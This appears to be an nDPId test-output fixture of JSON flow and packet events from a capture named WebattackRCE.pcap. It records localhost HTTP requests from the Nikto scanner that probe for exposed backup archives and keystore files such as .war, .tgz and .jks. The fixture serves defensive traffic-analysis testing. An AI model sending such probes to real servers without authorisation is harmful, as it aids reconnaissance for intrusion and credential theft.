00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_packet_id":1,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277176,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/G85AAEAGIGl\/AAABfwAAAcP8H5A9SCNDeIAPvYAYAED+swAAAQEICp1m\/OCdZvzgR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":314,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277176,"flow_last_seen":1576420277176,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277176,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50172,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_packet_id":1,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277177,"pkt":"AAAAAAAAAAAAAAAACABFAADAz0lAAEAGbOx\/AAABfwAAAcP+H5CCs\/fKIUNf1IAYAED+tAAAAQEICp1m\/OGdZvzhR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277177,"flow_last_seen":1576420277177,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277177,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50174,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_packet_id":1,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277179,"pkt":"AAAAAAAAAAAAAAAACABFAADAZxxAAEAG1Rl\/AAABfwAAAcQAH5BgPl+VSob0sYAYAED+tAAAAQEICp1m\/OOdZvzjR0VUIC9zaXRlLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277179,"flow_last_seen":1576420277179,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277179,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50176,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_packet_id":1,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277180,"pkt":"AAAAAAAAAAAAAAAACABFAADGTHlAAEAG77Z\/AAABfwAAAcQCH5A4KXT5upP6C4AYAED+ugAAAQEICp1m\/OSdZvzkR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":317,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277180,"flow_last_seen":1576420277180,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277180,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50178,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_packet_id":1,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277183,"pkt":"AAAAAAAAAAAAAAAACABFAADGDUpAAEAGLuZ\/AAABfwAAAcQEH5BEmzXIVOhE3IAYAED+ugAAAQEICp1m\/OadZvzmR0VUIC8xMjcuMC50YXIubHptYSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277183,"flow_last_seen":1576420277183,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277183,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50180,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_packet_id":1,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277184,"pkt":"AAAAAAAAAAAAAAAACABFAADAdAhAAEAGyC1\/AAABfwAAAcQGH5BYeUyXBV+uwoAYAED+tAAAAQEICp1m\/OidZvzoR0VUIC9zaXRlLnRneiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":319,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277184,"flow_last_seen":1576420277184,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277184,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50182,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
